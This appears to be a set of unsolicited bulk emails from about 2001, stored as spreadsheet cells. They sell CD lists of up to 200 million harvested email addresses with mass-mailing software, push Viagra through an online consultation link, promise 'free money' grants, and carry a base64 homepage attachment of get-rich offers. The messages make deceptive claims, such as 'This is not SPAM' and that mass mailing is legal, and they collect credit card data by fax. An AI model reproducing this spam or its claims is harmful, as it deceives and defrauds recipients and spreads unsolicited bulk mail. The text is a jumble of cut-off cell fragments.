TO ORDER BY PHONE - CALL   530-343-9681
OTHER PACKAGES AND OTHER METHODS - SEE BELOW
****************************************THE ECONOMY PLUS SPECIAL  (99,000,000 addresses AND  MASS MAILING SOFTWARE)
99,000,000 email addresses on CD
These name are all in text files
ready to mail!!!PLUS... A MASS MAILING SOFTWARE PROGRAM
$149.00
SEVERAL WAYS TO ORDER !!!
TO ORDER BY PHONE - CALL   530-343-9681
OTHER PACKAGES AND OTHER METHODS - SEE BELOW
****************************************
THE BRONZE MARKETING SETUP  (addresses ONLY)
200,000,000 email addresses on CD
These name are all in text files
ready to mail!!!
$149.00If you need HIGH SPEED mailing software keep reading below.  
SEVERAL WAYS TO ORDER !!!
TO ORDER BY PHONE - CALL   530-343-9681
OTHER PACKAGES AND OTHER METHODS - SEE BELOW
****************************************
THE SILVER MARKETING SETUP
200,000,000 email addresses on CD
These name are all in text files
ready to mail!!!       AND
Several different email programs 
and tools  to help with your mailings
and list management.
$ 189.00
SEVERAL WAYS TO ORDER !!!
TO ORDER BY PHONE - CALL   530-343-9681
OTHER PACKAGES AND OTHER METHODS - SEE BELOW
****************************************
THE GOLD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
$ 249
SEVERAL WAYS TO ORDER !!!
TO ORDER BY PHONE - CALL   530-343-9681
OTHER METHODS - SEE BELOW
*************************************************************THE PLATINUM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Internet.AND.....LIVE TECH SUPPORT... WHENEVER YOU NEED IT...
FOR AS LONG AS YOU NEED IT!!!$339**********************************************************SEVERAL WAYS TO ORDER !!!
TO ORDER BY PHONE - CALL   530-343-9681
OTHER METHODS - SEE BELOW
IF YOU ORDER BY PHONE OR FAX WE WILL SHIP YOUR CD CONTAINING THE 200 (99) MILLION + NAMES WITHIN 12 HOURS OF YOUR ORDER!!!WE ACCEPT:  AMERICAN EXPRESS,  VISA &amp; MASTERCARD
    TYPE OF CARD  AMX / VISA / MC??_______________
    EXPIRATION DATE   ___________________________
    NAME ON CREDIT CARD________________________
    CREDIT CARD #_______________________________
    BILLING ADDRESS ____________________________
    CITY_________________________________________
    STATE___________________ZIP__________________
    COUNTRY____________________________________
    PHONE INCLUDE AREA CODE___________________
    EMAIL ADDRESS______________________________ 
    WE WILL BILL selected amount to your account PLUS one of the 
following shipping costs:
     SHIPPING  COST OF $3.85 FIRST CLASS MAIL
     SHIPPING COST OF  $15.00  FEDERAL EXPRESS
     INTERNATIONAL SHIPPING CHARGE $25.00 
      + SALES TAX  added where required 
   1) FAX your order and a copy of your SIGNED check payable to 
Cyber FirePower!  for the appropriate amount to FAX # 530-343-1808.   2) Fax the same above requested credit card information to 
FAX # 530-343-1808. 
   3) Call phone # 530-343-9681.  This is a 24 hour phone 
number to place a CREDIT CARD order. This is an ORDER LINE
only.
ALL INFORMATION NECESSARY FOR YOU TO SUCCESSFULLY MAIL QUICKLY,
PROPERLY, &amp; LEGALLY IS PROVIDED WITH YOUR ORDER.Copyright 2000, 2001
Please NOTE: This advertisement is NOT sponsored by ANY
Internet Service Provider. This is an advertisement that is produced and
sponsored by Cyber FirePower! for Cyber FirePower! to reach potential customers.ALSO TAKE NOTE: At the time of this mailing the return email address is a bonafide
legitimate return email address that was signed up for with the express purpose of
receiving all undeliverable emails as well as remove requests. On occasion the return
email address provided may become disrupted by the efforts of, what we define as,
Internet terrorists. If this is the case and you wish removal please call us.
If you fax a copy of your phone bill where you called us for removal we will 
reimburse you via PayPal.Congress shall make no law respecting an establishment of religion, or prohibiting the free
 exercise thereof, or abridging the freedom of speech or of the press; or the right of the
 people peaceably to assemble, and to petition the Government for a redress of grievances.         
Amendment I, The US Constitution
</t>
  </si>
  <si>
    <t xml:space="preserve">
                                                VIAGRA  the breakthrough medication for impotence
delivered to your mailbox.....without leaving your computer.Simply Click Here:http://host.1bulk-email-software.com/ch4/pharm/blueIn less than 5 minutes you can complete the on-line consultation and in
many cases have the medication in 24 Â hours.Simply Click Here:http://host.1bulk-email-software.com/ch4/pharm/blue
&gt;From our website to your mailbox.
On-line consultation for treatment of compromised sexual function.Convenient...affordable....confidential.
We ship VIAGRA worldwide at US prices.To Order Visit:http://host.1bulk-email-software.com/ch4/pharm/blueThis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me.mailto:remove432@businessinfo-center.com</t>
  </si>
  <si>
    <t xml:space="preserve">
This is a multipart MIME message.--= Multipart Boundary 0802010258
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
              to remove your address per fed law
              print remove in subject line to--------
              route69@biker.com--= Multipart Boundary 0802010258
Content-Type: application/octet-stream;
	name="talkcity--page.01.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="talkcity--page.01.html"PCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL3BhZ2VzL1RDQ2xhc3NpY0Jpby50
eHQNCi0tPg0KPEhUTUw+IDwhLS0gVGFsa0NpdHkgVENDbGFzc2ljQmlvLnR4
dDogdmVyc2lvbiAxLCAxMyBBdWd1c3QgMTk5OS4gLS0+DQo8IS0tIFRlbXBs
YXRlIHNjcmlwdGluZyBsYW5ndWFnZSwgVmVyc2lvbiAxLjAgLS0+DQo8SEVB
RD4NCjxUSVRMRT5XZWxjb21lIHRvIGJpbGwgcmVkbW9uZCB3ZWIgZW50ZXJw
cmlzZXM8L1RJVExFPg0KPE1FVEEgTkFNRT0iREVTQ1JJUFRJT04iIENPTlRF
TlQ9ImJlbG93IHdob2xlc2FsZSBwcmljZXMgZm9yIGFsbCI+DQo8TUVUQSBO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bS9TcGFya3BsdWdTdC9iaWxyZWQvMDEuaHRtbCI+DQo8L0hFQUQ+DQoNCg0K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PSJjYWxsZXIiIHZhbHVlPSJodC9TaXRlTWFuYWdlciI+DQo8L2Zvcm0+DQo8
aHI+DQo8UD4NCg0KPCEtLQ0KQ0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL3Bh
Z2VzL0VkaXREaXNwSW5jLnR4dA0KLS0+DQoNCg0KPCEtLSBwYWdlIHByb3Bl
cnRpZXMgLS0+DQoNCjxQPg0KDQo8cD48Qj48Rk9OVCBTSVpFPSIrMiI+V2Vs
Y29tZSB0byBiaWxsIHJlZG1vbmQgd2ViIGVudGVycHJpc2VzPC9GT05UPjwv
Qj48UD4NCg0KDQo8VEFCTEUgQk9SREVSPTAgQ0VMTFNQQUNJTkc9MSBDRUxM
UEFERElORz0wIFdJRFRIPTYwMD4NCjxUUj48VEQgYmdjb2xvcj0jMDAwMDY2
IEhFSUdIVD0iMiI+PElNRyBTUkM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNv
bS9pbWFnZXMvc3BhY2VyLmdpZiIgV0lEVEg9NjAwIEhFSUdIVD0yIEFMSUdO
PWJvdHRvbT48L1REPjwvVFI+DQo8L1RBQkxFPg0KDQoNCjwhLS0gPElNRyBT
UkM9InBob3RvMS5naWYiIFZTUEFDRT02PjxCUj4gLS0+DQo8SU1HIHNyYz0i
aHR0cDovL2hvbWUudGFsa2NpdHkuY29tL2ltYWdlcy9zcGFjZXIuZ2lmIiBW
U1BBQ0U9Mz48YnI+DQo8IS0tIHRvcCBwaG90byAtLT4NCjwhLS0NCnRlbXBs
YXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0Zvcm1hdEltYWdlLnR4dA0KLS0+
DQo8YSBocmVmPSJzdGF0Lmh0bWwiPjxpbWcgc3JjPSI1NjBfMjM4NC5naWYi
ICAgID48L2E+DQoNCjwhLS0NCkNMT1NFIHRlbXBsYXRlcy9ob21ldG9vbC9j
b21wb25lbnRzL0Zvcm1hdEltYWdlLnR4dA0KLS0+DQo8YnI+DQo8SU1HIHNy
Yz0iaHR0cDovL2hvbWUudGFsa2NpdHkuY29tL2ltYWdlcy9zcGFjZXIuZ2lm
IiBWU1BBQ0U9Mz48YnI+DQoNCjxUQUJMRSBCT1JERVI9MCBDRUxMU1BBQ0lO
Rz0xIENFTExQQURESU5HPTAgV0lEVEg9NjAwPg0KPCEtLSBjYXB0aW9uIGZv
ciB0b3AgcGhvdG8gLS0+DQo8VFI+PFREIENPTFNQQU49NSBBTElHTj1DRU5U
RVI+PCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9ybWF0
VGV4dC50eHQNCi0tPg0KDQo8Zm9udCBmYWNlPSJBcmlhbCxIZWx2ZXRpY2Ei
IHNpemU9IjMiPjxiPndlbGNvbWUgdG8gYmlsbCByZWRtb25kIGVudGVycHJp
c2VzPC9iPjwvZm9udD48YnI+DQoNCg0KPGZvbnQgY29sb3I9IiNGRjAwMzMi
Pjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSIgc2l6ZT0iMyI+PGk+PGI+
DQ0KIGJlbG93IHdob2xlc2FsZSBwcmljZXMgb24sc3BvcnRpbmdzIGdvb2Rz
LCBhdXRvIGVsZWN0cm9uaWNzLGZyZWUgbW9udGhseSBjYXNoLTMgdGlwc2hl
ZXRzIGdlbmVyYXRlZCBmb3INDQp5b3VyIHN0YXRlPC9iPjwvaT48L2ZvbnQ+
PC9mb250Pg0KDQo8IS0tDQpDTE9TRSB0ZW1wbGF0ZXMvaG9tZXRvb2wvY29t
cG9uZW50cy9Gb3JtYXRUZXh0LnR4dA0KLS0+DQoNCjxCUj4mbmJzcDs8L1RE
PjwvVFI+DQo8VFI+PFREIGJnY29sb3I9IzAwMDA2NiBIRUlHSFQ9IjIiIENP
TFNQQU49NT48SU1HIFNSQz0iaHR0cDovL2hvbWUudGFsa2NpdHkuY29tL2lt
YWdlcy9zcGFjZXIuZ2lmIiBXSURUSD02MDAgSEVJR0hUPTIgQUxJR049Ym90
dG9tPjwvVEQ+PC9UUj4NCjxUUj48VEQgSEVJR0hUPSIyIiBDT0xTUEFOPTU+
PElNRyBTUkM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9pbWFnZXMvc3Bh
Y2VyLmdpZiIgV0lEVEg9NjAwIEhFSUdIVD0yPjwvVEQ+PC9UUj4NCjxUUj48
VEQgVkFMSUdOPXRvcCBXSURUSD0xMTI+DQo8Q0VOVEVSPg0KPCEtLSBzaWRl
IHBob3RvIC0tPg0KPCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVu
dHMvRm9ybWF0SW1hZ2UudHh0DQotLT4NCjxhIGhyZWY9IkhUVFA6Ly9XV1cu
Y2FsbHdhdmUuY29tL2ZpbmRvdXRtb3JlLmh0bWwiPjxpbWcgc3JjPSJuZXdn
ZXRpdG5vd2J1dHRvbjIuZ2lmIiAgICA+PC9hPg0KDQo8IS0tDQpDTE9TRSB0
ZW1wbGF0ZXMvaG9tZXRvb2wvY29tcG9uZW50cy9Gb3JtYXRJbWFnZS50eHQN
Ci0tPg0KDQo8L0NFTlRFUj48QlI+DQo8IS0tDQp0ZW1wbGF0ZXMvaG9tZXRv
b2wvY29tcG9uZW50cy9Gb3JtYXRUZXh0LnR4dA0KLS0+DQoNCg0KPGZvbnQg
Y29sb3I9IiNGRjAwMzMiPjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSIg
c2l6ZT0iMiI+Tk8gTkVFRCBUTyBCVVkgQSAyTkQgVEVMRVBIT05FIExJTkUt
LUdFVCBBTEwgWU9VUiBQSE9ORQ08YnI+DQpDQUxMUyBXSElMRSBPTiBZT1VS
IENPTVBVVEVSLS1USEVZIEdPIFNUUkFJR0hUIElOVE8gWU9VUiBFLU1BSUwt
LS1JVFMgIkZSRUUiLS0tQ0xJQ0sgSEVSRQ08YnI+DQo8L2ZvbnQ+PC9mb250
Pg0KDQo8IS0tDQpDTE9TRSB0ZW1wbGF0ZXMvaG9tZXRvb2wvY29tcG9uZW50
cy9Gb3JtYXRUZXh0LnR4dA0KLS0+DQoNCjxJTUcgU1JDPSJodHRwOi8vaG9t
ZS50YWxrY2l0eS5jb20vaW1hZ2VzL3NwYWNlci5naWYiIFdJRFRIPTExMiBI
RUlHSFQ9MSBBTElHTj1ib3R0b20+PEJSPg0KDQo8L1REPjxURCBWQUxJR049
dG9wPg0KPFA+Jm5ic3A7Jm5ic3A7DQo8L1REPjxURCBWQUxJR049dG9wIGJn
Y29sb3I9IiMwMDAwNjYiIFdJRFRIPTI+DQo8UD48SU1HIFNSQz0iaHR0cDov
L2hvbWUudGFsa2NpdHkuY29tL2ltYWdlcy9zcGFjZXIuZ2lmIiBXSURUSD0y
IEhFSUdIVD0xMCBBTElHTj1ib3R0b20+DQo8L1REPjxURCBWQUxJR049dG9w
Pg0KPFA+Jm5ic3A7Jm5ic3A7DQo8L1REPjxURCBWQUxJR049dG9wIFdJRFRI
PTQ2MD4NCjxQPjxDRU5URVI+PFRBQkxFIEJPUkRFUj0wIENFTExTUEFDSU5H
PTAgQ0VMTFBBRERJTkc9MCBXSURUSD0iNDYwIj4NCjxUUj4NCjxURCBWQUxJ
R049dG9wPg0KPElNRyBzcmM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9p
bWFnZXMvc3R5bGUvU2FpbGJvYXQvYWJvdXRfbWUuZ2lmIiBhbHQ9IkFib3V0
IE1lIiB3aWR0aD0yMjAgaGVpZ2h0PTQwIEFMSUdOPWJvdHRvbT48L1REPg0K
PFREIFZBTElHTj10b3AgQUxJR049UklHSFQ+PFAgQUxJR049UklHSFQ+PEI+
DQo8IS0tIGVtYWlsIC0tPg0KPGEgaHJlZj0ibWFpbHRvOmJpbGxyZWRtb0Bh
ZnJpY2FuYS5jb20iPmJpbGxyZWRtb0BhZnJpY2FuYS5jb208L2E+DQo8L1RE
Pg0KDQo8VEQgVkFMSUdOPXRvcCBXSURUSD01MSBST1dTUEFOPTI+DQoNCg0K
PFAgQUxJR049UklHSFQ+PEEgSFJFRj0ibWFpbHRvOmJpbGxyZWRtb0BhZnJp
Y2FuYS5jb20iPjxJTUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20v
aW1hZ2VzL2VtYWlsbWUuZ2lmIiBBTFQ9IkVtYWlsIE1lIiBXSURUSD01MSBI
RUlHSFQ9NTkgQk9SREVSPTAgQUxJR049dG9wPjwvQT4NCg0KDQo8QlI+PC9U
RD48L1RSPg0KPFRSPg0KPFREIFZBTElHTj10b3AgV0lEVEg9NDA5IENPTFNQ
QU49Mj4NCjwhLS0gR2VuZXJhbCB0ZXh0IG9mIHBhZ2UgLS0+DQo8UD48IS0t
DQp0ZW1wbGF0ZXMvaG9tZXRvb2wvY29tcG9uZW50cy9Gb3JtYXRUZXh0LnR4
dA0KLS0+DQoNCjxmb250IGZhY2U9IkFyaWFsLEhlbHZldGljYSIgc2l6ZT0i
MyI+PGI+dmlzaXQgYm90aCBvZiBiaWxsIHJlZG1vbmRzIGJlbG93IHdob2xl
c2FsZSBzdG9yZXM8L2I+PC9mb250Pjxicj4NCg0KDQo8Zm9udCBjb2xvcj0i
I0ZGMDAzMyI+PGZvbnQgZmFjZT0iVGltZXMiIHNpemU9IjMiPiIgbXkgb3Ro
ZXIgd2Vic2l0ZXMiDQ0KaHR0cDovL3d3dy5tcnJlZG1vbmQuY29tDQ0KaHR0
cDovL3d3dy53aWxsaWFtIHJlZG1vbmQuY29tPC9mb250PjwvZm9udD4NCg0K
PCEtLQ0KQ0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9y
bWF0VGV4dC50eHQNCi0tPg0KDQo8QlI+Jm5ic3A7PC9URD48L1RSPg0KPC9U
QUJMRT4NCjxUQUJMRSBCT1JERVI9MCBDRUxMU1BBQ0lORz0wIENFTExQQURE
SU5HPTAgV0lEVEg9IjQ2MCI+DQo8VFI+DQo8VEQgVkFMSUdOPXRvcCBDT0xT
UEFOPTMgV0lEVEg9IjQ2MCI+DQo8IS0tIHdoYXQgSSBsb29rIGZvciAtLT4N
CjwhLS0NCnRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0Zvcm1hdFRl
eHQudHh0DQotLT4NCg0KPGZvbnQgZmFjZT0iQXJpYWwsSGVsdmV0aWNhIiBz
aXplPSIzIj48Yj5XSEFUIEkgTE9PSyBGT1IgSU4gT1RIRVIgUEVPUExFPC9i
PjwvZm9udD48YnI+DQoNCg0KPGZvbnQgY29sb3I9IiNGRjAwMzMiPjxmb250
IGZhY2U9IlRpbWVzIiBzaXplPSIzIj4gICAgICAgICAgICAgIkdPVCBHT0xE
IElOIFlPVVIgQVRUSUMiDTxicj4NCkZPUiBFWEFNUExFLE9MRCBUViBTRVRT
IENPTlRBSU4gQVQgTEVBU1QgT04gT1VOQ0UhDTxicj4NCkNPTExFQ1QgQU5E
IFJFRklORSBZT1VSU0VMRiBBVCBIT01FLiBSVVNIICQyMC4wMCBUTy0NPGJy
Pg0KICAgICAgICAgICAgIFdJTExJQU0gTCBSRURNT05EDTxicj4NCiAgICAg
ICAgICAgICA4MDEgU08uIEggU1QuIEFQVC4yDTxicj4NCiAgICAgICAgICAg
ICBMQUtFV09SVEgsRkxBLjMzNDYwPC9mb250PjwvZm9udD4NCg0KPCEtLQ0K
Q0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9ybWF0VGV4
dC50eHQNCi0tPg0KDQo8QlI+DQombmJzcDsNCjwvVEQ+PC9UUj4NCjxUUj4N
CjxURCBWQUxJR049dG9wIFdJRFRIPSIyMjUiPg0KPElNRyBTUkM9Imh0dHA6
Ly9ob21lLnRhbGtjaXR5LmNvbS9pbWFnZXMvc3BhY2VyLmdpZiIgV0lEVEg9
MjI1IEhFSUdIVD0xIEFMSUdOPWJvdHRvbT48QlI+DQo8IS0tIGxpa2VzIC0t
Pg0KPCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVudHMvRm9ybWF0
VGV4dC50eHQNCi0tPg0KDQo8Zm9udCBmYWNlPSJBcmlhbCxIZWx2ZXRpY2Ei
IHNpemU9IjMiPjxiPlRISU5HUyBJIExJS0U8L2I+PC9mb250Pjxicj4NCg0K
DQo8Zm9udCBjb2xvcj0iI0ZGMDAzMyI+PGZvbnQgZmFjZT0iVGltZXMiIHNp
emU9IjMiPiAgICAgICAgICAgICAgIlRIUk9XSU5HIEFXQVkiDQ0KICAgICAg
ICAgICAgICAgJDUgRE9MTEFSUyBQRVIgUE9VTkQNDQpldmVyeW9uZSBoYXMg
dGhyb3duIGF3YXkgYSBsaXR0bGUga25vd24gYXNzZXQub25seSBvbmUgb3V0
IG9mIDEsMDAwIHNhdmUgaXQuIGxlYXJuIGhvdyB0byBjb2xsZWN0IHRoaXMg
bWF0ZXJpYWwgZnJvbSB0aG9zZSB3aG8gZG9uInQga25vdyBpdHMgdmFsdWUs
YW5kIHdoZXJlIHRvIHNhbGUgZm9yICQ1cGVyIGxiLi0tLXNlbmQgJDIwLjAw
IHRvLS13aWxsaWFtIHJlZG1vbmQNDQogICAgICAgICAgICAgICAgICAgODAx
IHNvLiBoIHN0LiBhcHQuMg0NCiAgICAgICAgICAgICAgICAgICBsYWtld29y
dGgsZmxhLjMzNDYwDQ0KDQ0KDQ0KIA0NCiAgICAgICAgICAgPC9mb250Pjwv
Zm9udD4NCg0KPCEtLQ0KQ0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBv
bmVudHMvRm9ybWF0VGV4dC50eHQNCi0tPg0KDQo8QlI+DQoNCiZuYnNwOw0K
DQo8L1REPjxURCBXSURUSD0iMTAiPg0KPFA+Jm5ic3A7Jm5ic3A7Jm5ic3A7
DQo8L1REPjxURCBWQUxJR049dG9wIFdJRFRIPSIyMjUiPg0KPElNRyBTUkM9
Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9pbWFnZXMvc3BhY2VyLmdpZiIg
V0lEVEg9MjI1IEhFSUdIVD0xIEFMSUdOPWJvdHRvbT48QlI+DQo8IS0tIGRp
c2xpa2VzIC0tPg0KPCEtLQ0KdGVtcGxhdGVzL2hvbWV0b29sL2NvbXBvbmVu
dHMvRm9ybWF0VGV4dC50eHQNCi0tPg0KDQo8Zm9udCBmYWNlPSJBcmlhbCxI
ZWx2ZXRpY2EiIHNpemU9IjMiPjxiPlRISU5HUyBJIERPTidUIExJS0U8L2I+
PC9mb250Pjxicj4NCg0KDQo8Zm9udCBmYWNlPSJUaW1lcyIgc2l6ZT0iMyI+
ImluY29tZSB0YXhlcy0tLS1kZWJ0cy0tLS1zcGFtIGUtbWFpbCI8L2ZvbnQ+
DQoNCjwhLS0NCkNMT1NFIHRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRz
L0Zvcm1hdFRleHQudHh0DQotLT4NCg0KPEJSPg0KDQoNCiZuYnNwOw0KPC9U
RD48L1RSPg0KPFRSPg0KPFREIFdJRFRIPSIyMjUiIFZBTElHTj10b3A+DQo8
UD4NCjxJTUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20vaW1hZ2Vz
L3N0eWxlL1NhaWxib2F0L2Zhdl91cmwuZ2lmIiBBTFQ9IkZhdm9yaXRlIFVS
THMiIFdJRFRIPTIyMCBIRUlHSFQ9NDAgQUxJR049Ym90dG9tPg0KPEJSPjxG
T05UIFNJWkU9Ii0xIiBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk15IGZyaWVu
ZHMnIGhvbWUgcGFnZXMsIGZhdm9yaXRlIFVSTHMsIG90aGVyIHBhZ2VzIG9u
IG15IHdlYiBzaXRlLjwvRk9OVD48QlI+Jm5ic3A7PC9URD4NCg0KPFREPg0K
PC9URD4NCg0KPFREIFdJRFRIPSIyMjUiIFZBTElHTj10b3A+DQo8UD4NCjxJ
TUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20vaW1hZ2VzL3N0eWxl
L1NhaWxib2F0L2Zhdl9jaGF0LmdpZiIgQUxUPSJGYXZvcml0ZSBDaGF0cyIg
V0lEVEg9MjIwIEhFSUdIVD00MCBBTElHTj1ib3R0b20+DQo8QlI+PEZPTlQg
U0laRT0iLTEiIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGFsayBDaXR5IGNo
YXQgcm9vbXMgd2hlcmUgeW91J2xsIGZpbmQgbWUuPC9GT05UPjxCUj4mbmJz
cDs8L1REPjwvVFI+DQoNCjxUUj4NCjxURCBWQUxJR049dG9wPg0KDQo8IS0t
IHVybCBsaXN0IC0tPg0KDQo8Qj48QSBIUkVGPSJodHRwOi8vc3RvcmUueWFo
b28uY29tL2NnaS1iaW4vY2xpbms/Y2xhc3NpZmllZHMrd2c1ZHdlK2luZGV4
Lmh0bWwiPnBsYWNlIHlvdXIgYWQgaW4gb3ZlciA4LDAwMCBuZXdzcGFwZXJz
ISBjbGljayBoZXJlITwvQT48L0I+IC0gIDwvRk9OVD48UD4NCjxCPjxBIEhS
RUY9Imh0dHA6Ly93d3cuaXdpbi5jb20vbG9naW4vcmVnaXN0ZXIuYXNwP2li
dWRkeT03MjM2QGJlbGxzb3V0aC5uZXQ8YnI+Ij5wbGF5LSQxIG1pbGxpb24g
ZG9sbGFyIGxvdHRlcnk8L0E+PC9CPiAtICA8L0ZPTlQ+PFA+DQo8Qj48QSBI
UkVGPSJodHRwOi8vaG9tZS50YWxrY2l0eS5jb20vU3BhcmtwbHVnU3QvYmls
cmVkL3N0YXQuaHRtbCI+bWFrZSBtb25leSBmcm9tIHlvdXIgd2Vic2l0ZSEg
am9pbiBsaW5rc2hhcmUsPC9BPjwvQj4gLSAgPC9GT05UPjxQPg0KPEI+PEEg
SFJFRj0iaHR0cDovL3d3dy5zZW5pb3JleHBsb3Jlci5jb20iPmFsbCBzZW5p
b3IgY2l0aXplbnMgICBnZXQgeW91ciBmcmVlLWNvbXB1dGVyPC9BPjwvQj4g
LSAgPC9GT05UPjxQPg0KPEI+PEEgSFJFRj0iaHR0cDovL3d3dy5zd2VlcHNj
bHViLmNvbS9pbmRleC5odG1sP3NjcmF0Y2hwcm9tbz15ZXMmYWZmaWxpYXRl
c2Vxbm89MTAxMCI+am9pbiBzd2VlcHNjbHViLW1ha2UgJDEsMDAwIGV2ZXJ5
ZGF5ITwvQT48L0I+IC0gIDwvRk9OVD48UD4NCjxCPjxBIEhSRUY9Imh0dHA6
Ly93d3cubG93ZXJteWJpbGxzLmNvbSI+TE9XRVIgQUxMIFlPVVIgQklMTFMt
Z2FzLXdhdGVyLWVsZWN0cmljLWhvdXNlIHBheW1lbnRzPC9BPjwvQj4gLSAg
PC9GT05UPjxQPg0KPEI+PEEgSFJFRj0iaHR0cDovL2hvbWUudGFsa2NpdHku
Y29tL1NwYXJrcGx1Z1N0L2JpbHJlZC8wMi5odG1sIj5zZWUgcGFnZTItLWJp
bGwgcmVkbW9uZCBlbnRlcnByaXNlczwvQT48L0I+IC0gIDwvRk9OVD48UD4N
CjxCPjxBIEhSRUY9Imh0dHA6Ly93d3cubXJyZWRtb25kLmNvbSI+IkJJTEwg
UkVETU9ORCJTIFNJVEUgT0YgVEhFIE1PTlRILUNMSUNLPC9BPjwvQj4gLSAg
PC9GT05UPjxQPg0KDQo8L1REPjxURD4NCjwvVEQ+PFREIFZBTElHTj10b3A+
DQoNCjwhLS0gY2hhdCBsaXN0IC0tPg0KDQo8Qj48QSBIUkVGPSJodHRwOi8v
d3d3LnRhbGtjaXR5LmNvbS9jaGF0L2NoYXRsYXVuY2hlci5odG1wbD9yb29t
PVRvd25UYWxrIj5Ub3duVGFsazwvQT48L0I+IC0gR3JlYXQgcGxhY2UgdG8g
bWVldCBwZW9wbGUuPC9GT05UPjxQPg0KDQo8L1REPjwvVFI+DQo8L1RBQkxF
Pg0KDQo8L0NFTlRFUj4NCg0KPC9URD48L1RSPg0KPFRSPjxURCBIRUlHSFQ9
IjIiIENPTFNQQU49NT48SU1HIFNSQz0iaHR0cDovL2hvbWUudGFsa2NpdHku
Y29tL2ltYWdlcy9zcGFjZXIuZ2lmIiBXSURUSD02MDAgSEVJR0hUPTI+PC9U
RD48L1RSPg0KPFRSPjxURCBiZ2NvbG9yPSMwMDAwNjYgSEVJR0hUPSIyIiBD
T0xTUEFOPTU+PElNRyBTUkM9Imh0dHA6Ly9ob21lLnRhbGtjaXR5LmNvbS9p
bWFnZXMvc3BhY2VyLmdpZiIgV0lEVEg9NjAwIEhFSUdIVD0yIEFMSUdOPWJv
dHRvbT48L1REPjwvVFI+DQo8L1RBQkxFPg0KDQo8UD48IS0tIEd1ZXN0Ym9v
ayAtLT4NCjwhLS0NCnRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0d1
ZXN0Ym9va0ljb25zLnR4dA0KLS0+DQoNCjxhIGhyZWY9Imh0dHA6Ly9qLnRh
bGtjaXR5LmNvbS9odC9HdWVzdGJvb2tFbnRyeT9wYWdlX2lkPTQyODE3MDQm
Y29tcF9pZD03NjI5ODMiPjxJTUcgU1JDPSJodHRwOi8vaG9tZS50YWxrY2l0
eS5jb20vaW1hZ2VzL3N0eWxlL1NhaWxib2F0L3NpZ25fZ3Vlc3Rib29rLmdp
ZiIgQk9SREVSPTA+PC9hPg0KJm5ic3A7Jm5ic3A7Jm5ic3A7DQo8YSBocmVm
PSJodHRwOi8vai50YWxrY2l0eS5jb20vaHQvR3Vlc3Rib29rRGlzcGxheT9w
YWdlX2lkPTQyODE3MDQmY29tcF9pZD03NjI5ODMiPjxJTUcgU1JDPSJodHRw
Oi8vaG9tZS50YWxrY2l0eS5jb20vaW1hZ2VzL3N0eWxlL1NhaWxib2F0L3Jl
YWRfZ3Vlc3Rib29rLmdpZiIgQk9SREVSPTA+PC9hPg0KDQoNCjwhLS0NCkNM
T1NFIHRlbXBsYXRlcy9ob21ldG9vbC9jb21wb25lbnRzL0d1ZXN0Ym9va0lj
b25zLnR4dA0KLS0+DQoNCjwvQ0VOVEVSPg0KPFA+PENFTlRFUj4NCg0KPEI+
WW91IGFyZSB2aXNpdG9yIG51bWJlcjwvQj48QlI+DQoNCjxpbWcgc3JjPSJo
dHRwOi8vaW1hZ2VzLnRhbGtjaXR5LmNvbS9pbWcvaG9tZXBhZ2VzL2NvdW50
ZXIvbHZpY3Rvcmlhbi5naWYiIGFsdD0iZW5kIGNhcCIgaGVpZ2h0PSIzNyIg
d2lkdGg9IjI0Ij48aW1nIHNyYz0iaHR0cDovL2ltYWdlcy50YWxrY2l0eS5j
b20vaW1nL2hvbWVwYWdlcy9jb3VudGVyLzR2aWN0b3JpYW4uZ2lmIiBoZWln
aHQ9IjM3IiB3aWR0aD0iMjQiPjxpbWcgc3JjPSJodHRwOi8vaW1hZ2VzLnRh
bGtjaXR5LmNvbS9pbWcvaG9tZXBhZ2VzL2NvdW50ZXIvM3ZpY3Rvcmlhbi5n
aWYiIGhlaWdodD0iMzciIHdpZHRoPSIyNCI+PGltZyBzcmM9Imh0dHA6Ly9p
bWFnZXMudGFsa2NpdHkuY29tL2ltZy9ob21lcGFnZXMvY291bnRlci9ydmlj
dG9yaWFuLmdpZiIgYWx0PSJlbmQgY2FwIiBoZWlnaHQ9IjM3IiB3aWR0aD0i
MjQiPg0KPC9DRU5URVI+DQoNCjwvQk9EWT4NCjwvSFRNTD4NCg0KPCEtLQ0K
Q0xPU0UgdGVtcGxhdGVzL2hvbWV0b29sL3BhZ2VzL1RDQ2xhc3NpY0Jpby50
eHQNCi0tPg0K--= Multipart Boundary 0802010258--
</t>
  </si>
  <si>
    <t>Below is the result of your feedback form.  It was submitted by
Lizzy young (lizzy@hkg.net) on Thursday, August 2, 2001 at 08:13:36
---------------------------------------------------------------------------message: Here is the information you requested:If you are interested in learning how to get $10,000
to over $500,000 in free money, for Business, Education, 
or personal needs, Please visit our website at: 
http://1chn.com/ch7/
We strongly oppose the use of SPAM email and do not want anyone who does not
wish to receive our mailings to receive them. As a result, we have retained
the services of an independent 3rd party to administer our list management
and remove list(www.removeyou.com). This is not SPAM. If you do not wish to
